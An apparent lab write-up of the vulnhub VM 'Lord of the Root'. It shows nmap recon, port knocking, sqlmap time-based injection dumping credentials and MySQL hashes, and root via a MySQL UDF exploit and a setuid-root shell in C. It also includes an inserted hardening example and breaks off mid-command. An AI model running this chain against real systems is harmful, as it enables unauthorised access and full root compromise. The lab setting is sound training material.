The Return of the King to become the lord of the R00t

This post is a walk-through for a VM “Lord of the Root” from vulnhub. The interesting thing about this post is that along with the solution, this post will also focus on different approaches I tried and the hindrances I faced while trying those approaches. So, let the hacking begin!!!!

I used a Kali VM as the attacker, with IP address 192.168.56.102. The vulnerable VM is assigned its IP address dynamically, so the first and foremost step was to find the IP address of the vulnerable machine. Running netdiscover with the -r option and an IP range discovers all the hosts that are up; doing so told me that the target's IP address was 192.168.56.101. Now what? Of course, scan that target for open ports and services. One important point to note here is that before scanning any system it is good practice to check whether ping is enabled or disabled on it; knowing this tiny yet valuable piece of information lets you construct your nmap query accordingly for accurate results. Ping was disabled on the target system, so I fired the following query:

root@kali:~# nmap -sV -Pn 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 21:57 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00075s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.46 seconds

As you can see in the output, only the SSH port was open, running OpenSSH 6.6.1p1. The first thing I tried was hydra to brute-force the SSH username and password, but there was no luck with that. The following message was the hint when I tried connecting to the SSH service.

ssh root@192.168.56.101

[figlet-style ASCII banner reading "LOTR" and "Knock Friend To Enter"]
Easy as 1,2,3
root@192.168.56.101's password:

I tried googling that message in combination with SSH, for example: SSH 1,2,3, SSH friend, SSH Knock. Searching for the last term, I came across the concept known as port knocking. Having learned the concept, I tried the following command to port-knock the system:

nmap -sV -Pn -r 192.168.56.101 -p 1,2,3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 22:17 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

Note: -r --> scan ports consecutively, don't randomize.

Once again, an nmap scan was used to find out whether any other ports had opened after the port knock.

root@kali:~# nmap -sV -Pn 192.168.56.101 -p1-65535

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 23:27 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00061s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds

Note:
-sV --> probe open ports to determine service/version info.
-Pn --> treat all hosts as online, i.e. skip the ping-based host discovery.

As we can see in the output, port 1337 is now open. I visited that port in the browser and stumbled upon the following web page. I looked at the source, but there wasn't anything special.

[screenshot: the web page served on port 1337]

A quick scan with DirBuster on https://192.168.56.101:1337/ found the image directory, which was accessible on the server. The image directory held the following two additional images along with the images from the page above.


Since I wanted to view the source code of an HTML page, I tried changing each of their extensions from .jpg to .html and, surprisingly, all of them redirected me to a single HTML page.

[screenshot: the HTML page reached by renaming the image extension]

Looking at the source code, I came across a base64 string:

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

I tried decoding it. The result was another base64 string; decoding that in turn revealed a .php path, as shown below.

root@kali:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

root@kali:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!" | base64 -d
/978345210/index.phpbase64: invalid input

I entered the above address in my web browser as http://192.168.56.101:1337/978345210/index.php and voilà! I was at the Gates of Mordor.

[screenshot: the Gates of Mordor login page]

Now what? Of course I had to find a way in by exploiting this login page, and the only approach I could think of was SQL injection (that's the only way I know as of now :P). So I tried sqlmap. The first step was to determine whether any SQL injection is present here and, if so, which parameter lets us inject our payload. Once that is done, the next part was to enumerate the databases (if any) down under. So here is the command I used:

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --level 5 --risk 3 --forms --dbs
 ___
 __H__
 ___ ___[,]_____ ___ ___ {1.0.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:10:40

[02:10:40] [INFO] testing connection to the target URL
[02:10:40] [INFO] heuristics detected web page charset 'ascii'
[02:10:40] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[02:11:00] [INFO] using '/root/.sqlmap/output/results-12122016_0211am.csv' as the CSV results file in multiple targets mode
[02:11:00] [INFO] heuristics detected web page charset 'ascii'
[02:11:00] [INFO] testing if the target URL is stable
[02:11:01] [INFO] target URL is stable
[02:17:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:18:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:18:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[02:50:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[02:50:06] [INFO] fetching database names
[02:50:06] [INFO] fetching number of databases
[02:50:06] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:50:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4
[02:50:46] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[02:51:39] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[02:56:21] [INFO] retrieved: Webapp
[02:58:04] [INFO] retrieved: mysql
[02:59:26] [INFO] retrieved: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

[03:04:09] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0211am.csv'

[*] shutting down at 03:04:09

So, as we can see, valuable information came back to us. Most importantly: SQL injection is present in the password parameter, the underlying database is MySQL, and thirdly we have the database names. There are 4 databases on the underlying system. I tried the other three and found nothing, but the fourth one, Webapp, was interesting. So the next obvious step was to determine the tables present in the Webapp database. I used the following command to do that:

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp --tables
 ___
 __H__
 ___ ___["]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:35:45

[05:35:46] [INFO] testing connection to the target URL
[05:35:46] [INFO] heuristics detected web page charset 'ascii'
[05:35:46] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[05:36:02] [INFO] resuming back-end DBMS 'mysql' 
[05:36:02] [INFO] using '/root/.sqlmap/output/results-12122016_0536am.csv' as the CSV results file in multiple targets mode
[05:36:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[05:36:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[05:36:07] [INFO] fetching tables for database: 'Webapp'
[05:36:07] [INFO] fetching number of tables for database 'Webapp'
[05:36:07] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:36:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:36:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:37:51] [INFO] adjusting time delay to 1 second due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[05:38:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0536am.csv'

[*] shutting down at 05:38:59

Here, a small tip: once we know which DBMS the underlying system is using, we can restrict the enumeration to MySQL (or whichever DBMS it is) with the following option.

--dbms=DBMS --> force back-end DBMS to this value

So, as we can see in the output, there is only one table in the Webapp database. Let's try to find the columns in that "Users" table.

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users --columns 
 ___
 __H__
 ___ ___[,]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:58:03

[05:58:03] [INFO] testing connection to the target URL
[05:58:04] [INFO] heuristics detected web page charset 'ascii'
[05:58:04] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[05:58:18] [INFO] resuming back-end DBMS 'mysql' 
[05:58:18] [INFO] using '/root/.sqlmap/output/results-12122016_0558am.csv' as the CSV results file in multiple targets mode
[05:58:18] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[05:58:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[05:58:21] [INFO] fetching columns for table 'Users' in database 'Webapp'
[05:58:22] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:58:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[06:12:44] [INFO] adjusting time delay to 2 seconds due to good response times
3
[06:12:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[06:13:17] [INFO] adjusting time delay to 1 second due to good response times
id
[06:13:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
int(10)
[06:15:40] [INFO] retrieved: username
[06:17:33] [INFO] retrieved: varchar(255)
[06:20:39] [INFO] retrieved: password
[06:22:57] [INFO] retrieved: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[06:26:03] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0558am.csv'

[*] shutting down at 06:26:03

I found three columns in the Users table, so let's dump the contents of those columns, starting with username, using the following command:

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users -C username --dump
 ___
 __H__
 ___ ___[.]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:34:49

[08:34:49] [INFO] testing connection to the target URL
[08:34:49] [INFO] heuristics detected web page charset 'ascii'
[08:34:50] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[08:35:19] [INFO] resuming back-end DBMS 'mysql' 
[08:35:19] [INFO] using '/root/.sqlmap/output/results-12122016_0835am.csv' as the CSV results file in multiple targets mode
[08:35:19] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[08:37:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[08:37:58] [INFO] fetching entries of column(s) 'username' for table 'Users' in database 'Webapp'
[08:37:58] [INFO] fetching number of column(s) 'username' entries for table 'Users' in database 'Webapp'
[08:37:58] [INFO] resumed: 5
[08:37:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:24:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
a
[10:25:01] [INFO] adjusting time delay to 2 seconds due to good response times
ragorn
[10:27:54] [INFO] retrieved: frodo
[10:30:56] [INFO] retrieved: gimli
[10:33:28] [INFO] retrieved: legolas
[10:37:11] [INFO] retrieved: smeagol
[10:40:44] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----------+
| username |
+----------+
| aragorn |
| frodo |
| gimli |
| legolas |
| smeagol |
+----------+

[10:40:44] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/Webapp/Users.csv'
[10:40:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0835am.csv'

[*] shutting down at 10:40:44

Content from password column:

 root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users -C password --dump
 ___
 __H__
 ___ ___[(]_____ ___ ___ {1.0.12#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:29:24

[07:29:24] [INFO] testing connection to the target URL
[07:29:24] [INFO] heuristics detected web page charset 'ascii'
[07:29:24] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[07:29:41] [INFO] resuming back-end DBMS 'mysql' 
[07:29:41] [INFO] using '/root/.sqlmap/output/results-12122016_0729am.csv' as the CSV results file in multiple targets mode
[07:29:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[07:29:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[07:29:44] [INFO] fetching entries of column(s) 'password' for table 'Users' in database 'Webapp'
[07:29:44] [INFO] fetching number of column(s) 'password' entries for table 'Users' in database 'Webapp'
[07:29:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[07:52:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[07:53:08] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
A
[07:54:25] [INFO] adjusting time delay to 1 second due to good response times
ndMyAxe
[07:56:39] [INFO] retrieved: AndMyBow
[07:59:17] [INFO] retrieved: AndMySword
[08:02:27] [INFO] retrieved: iwilltakethering
[08:06:39] [INFO] retrieved: MyPreciousR00t
[08:10:40] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+------------------+
| password |
+------------------+
| AndMyAxe |
| AndMyBow |
| AndMySword |
| iwilltakethering |
| MyPreciousR00t |
+------------------+

[08:10:40] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/Webapp/Users.csv'
[08:10:40] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0729am.csv'

[*] shutting down at 08:10:40

Here is the important output from the above dumps, arranged side by side:

+----------+------------------+
| username | password         |
+----------+------------------+
| aragorn  | AndMyAxe         |
| frodo    | AndMyBow         |
| gimli    | AndMySword       |
| legolas  | iwilltakethering |
| smeagol  | MyPreciousR00t   |
+----------+------------------+

I tried all the usernames and passwords on the Gates of Mordor web page, but none of them worked. After some thought on this issue I tried these credentials on the SSH service and voilà, the last credential worked and I was on the system with smeagol's privileges.
Now what? The obvious step was to escalate our privileges to root level, since that was the ultimate goal.
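Before moving to privilege escalation, here is an added example (not the VM's code) of the two application-side defects this foothold relied on: the password parameter pasted straight into the SQL text, and passwords stored in plaintext that were then reused for SSH. It uses the Users layout and the five credential pairs dumped above; sqlite3 stands in for MySQL and the PBKDF2 storage scheme is an assumption.

```python
"""Login handling behind a form like the Gates of Mordor page: the injectable
string-concatenation pattern next to a hardened version.

Added example, not the VM's code. The Webapp.Users layout (id, username,
password) and the five credential pairs come from the sqlmap dumps above;
sqlite3 stands in for MySQL, and the hashing scheme is assumed."""
import hashlib
import hmac
import os
import sqlite3

# Credential pairs recovered above; the VM stored them in plaintext.
USERS = [
    ("aragorn", "AndMyAxe"),
    ("frodo", "AndMyBow"),
    ("gimli", "AndMySword"),
    ("legolas", "iwilltakethering"),
    ("smeagol", "MyPreciousR00t"),
]

# sqlmap's time-based payload from the walkthrough, verbatim. It is MySQL
# syntax (DUAL, SLEEP), so it is only used here to show the resulting SQL text.
SQLMAP_PAYLOAD = "'||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'"


def build_query_unsafe(username, password):
    """The pattern that makes the password parameter injectable: user input is
    pasted into the SQL text, so a quote in the input ends the string literal
    and whatever follows is parsed as SQL."""
    return ("SELECT id FROM Users WHERE username='%s' AND password='%s'"
            % (username, password))


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'salt_hex$digest_hex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex = stored.split("$", 1)[0]
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    # Constant-time compare so the check itself leaks nothing via timing.
    return hmac.compare_digest(candidate, stored)


def make_db(hashed):
    """In-memory Users table; plaintext passwords (as on the VM) or hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, "
                 "username VARCHAR(255), password VARCHAR(255))")
    rows = [(u, hash_password(p) if hashed else p) for u, p in USERS]
    conn.executemany("INSERT INTO Users (username, password) VALUES (?, ?)", rows)
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable: concatenated query, plaintext comparison done by the DB."""
    row = conn.execute(build_query_unsafe(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    """Hardened: parameterised lookup, then a salted-hash check in code."""
    row = conn.execute("SELECT password FROM Users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        hash_password(password)  # burn a hash so unknown users reject no faster
        return False
    return verify_password(password, row[0])


if __name__ == "__main__":
    print(build_query_unsafe("bczG", SQLMAP_PAYLOAD))  # SLEEP(5) is now SQL
    plain, hashed = make_db(False), make_db(True)
    bypass = "' OR '1'='1"  # boolean variant of the same defect
    print("unsafe, valid creds:", login_unsafe(plain, "smeagol", "MyPreciousR00t"))
    print("unsafe, bypass     :", login_unsafe(plain, "nobody", bypass))
    print("safe,   valid creds:", login_safe(hashed, "smeagol", "MyPreciousR00t"))
    print("safe,   bypass     :", login_safe(hashed, "nobody", bypass))
```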

The first step in Linux privilege escalation is system enumeration. While researching this I came across one excellent blog, or rather what I would call the bible of privilege escalation, written by G0tmi1k: Basic Linux Privilege Escalation. I quickly googled for a script to do this enumeration, since doing all of it manually is a hectic process, and came across one nice script which I will be using here; it's called linuxprivchecker.py.

I downloaded the script and placed it in the html folder on my Kali machine, then used wget to transfer it to the vulnerable machine. Executing the script gave some interesting results. The good thing about this script is that, along with the important information about the system, it also lists possible exploits that can be looked at and tested on this system.

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
 - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

The following exploits are applicable to this kernel version and should be investigated as well
 - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
 - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
 - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
 - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
 - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
 - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
 - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Finished

Visiting the MySQL exploit link, I learned that this exploit is only possible if MySQL is running as root. I rechecked the output from linuxprivchecker to make sure that mysqld was running as root before using this exploit code. A simple way to do that is as follows.

smeagol@LordOfTheRoot:~/Downloads$ python linuxprivchecker.py > output_linux
smeagol@LordOfTheRoot:~/Downloads$ cat output_linux | grep "mysql"
 -rw------- 1 smeagol smeagol 492 Jan 7 17:28 /home/smeagol/.mysql_history
 mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
 drwxr-s--- 2 mysql adm 4096 Jan 7 17:12 /var/log/mysql
 /etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
 libdbd-mysql-perl 4.025-1 Perl5 database interface to the MySQL database
 libmysqlclient18:i386 5.5.44-0ubuntu0.14.04.1 MySQL database client library
 mysql-client-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database client binaries
 mysql-client-core-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database core client binaries
 mysql-common 5.5.44-0ubuntu0.14.04.1 MySQL database common files, e.g. /etc/mysql/my.cnf
 mysql-server 5.5.44-0ubuntu0.14.04.1 MySQL database server (metapackage depending on the latest version)
 mysql-server-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database server binaries and system database setup
 mysql-server-core-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database server binaries
 php5-mysql 5.5.9+dfsg-1ubuntu4.11 MySQL module for php5
 php5-mysqlnd 5.5.9+dfsg-1ubuntu4.11 MySQL module for php5 (Native Driver)
 root 1150 Jan07 0:47 /usr/sbin/mysqld
 root 1150 Jan07 0:47 /usr/sbin/mysqld

Now we needed the MySQL root password in order to use that exploit. Again, I used sqlmap to dig deeper, this time into the mysql database, with the following command:

Root@kali:~# sqlmap -u http://192.168.56.101:1337/978345210/index.php --forms --dbms=MySQL -D mysql -T user -C user,password --dump

Output:

Table: user
[5 entries]
+------------------+-------------------------------------------+
| user | password |
+------------------+-------------------------------------------+
| debian-sys-maint | *A55A9B9049F69BC2768C9284615361DFBD580B34 |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
+------------------+-------------------------------------------+

[15:22:45] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/mysql/user.csv'
[15:22:45] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-01082017_0148pm.csv'

[*] shutting down at 15:22:45

Using an online hash cracker, I found that the password is darkshadow.

The next step was to try out every single step explained in the 1518.c exploit from Exploit-DB, so I quickly used my shell access to log in to MySQL as root with the above password. First I compiled the C code.

root@kali $ gcc -g -c 1518.c
root@kali $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
mysql> use mysql
Database changed

mysql> insert into mysql_exploit values (load_file('/home/smeagol/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from mysql_exploit into dumpfile '/usr/lib/mysql/plugin/1518.so';


mysql> create function do_system returns integer soname '1518.so'


mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)


mysql> select do_system ('id> tmp/out; chown smeagol.smeagol /tmp/out');
+-----------------------------------------------------------+
| do_system ('id> tmp/out; chown smeagol.smeagol /tmp/out') |
+-----------------------------------------------------------+
|                                                         0 |
+-----------------------------------------------------------+

After executing the above command, I checked the /tmp/out file with cat.

root@kali $ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin)

The command worked: we executed it as the root user. But that wasn't complete root access, so while doing some research I came across one blog which explained the above-mentioned exploit in detail.
The method to get permanent root access over the system is explained below; the link to the blog can be found here: Blog.

This method follows the same concept, but this time it compiles a small C program and sets the SUID bit on it, so that running it gives a root shell. Below is the C code which will be compiled.

#include <stdio.h>
#include <stdlib.h>      /* system() */
#include <sys/types.h>
#include <unistd.h>      /* setuid(), setgid() */

int main(void)
{
    setuid(0);           /* binary is SUID root, so this makes all uids 0 */
    setgid(0);
    system("/bin/bash");
    return 0;
}

Now, from inside MySQL, we compile the code, set the SetUID bit (the file is created by mysqld, which runs as root), and then execute the binary as smeagol.

mysql> select do_system ('gcc -o /home/smeagol/shell /home/smeagol/shell.c');
+------------------------------------------------------------------------+
| do_system ('gcc -o /home/smeagol/shell /home/smeagol/shell.c') |
+------------------------------------------------------------------------+
|                                                                      0 |
+------------------------------------------------------------------------+
1 row in set (1.42 sec)

mysql> select do_system('chmod u+s /home/smeagol/shell');
+------------------------------------------------+
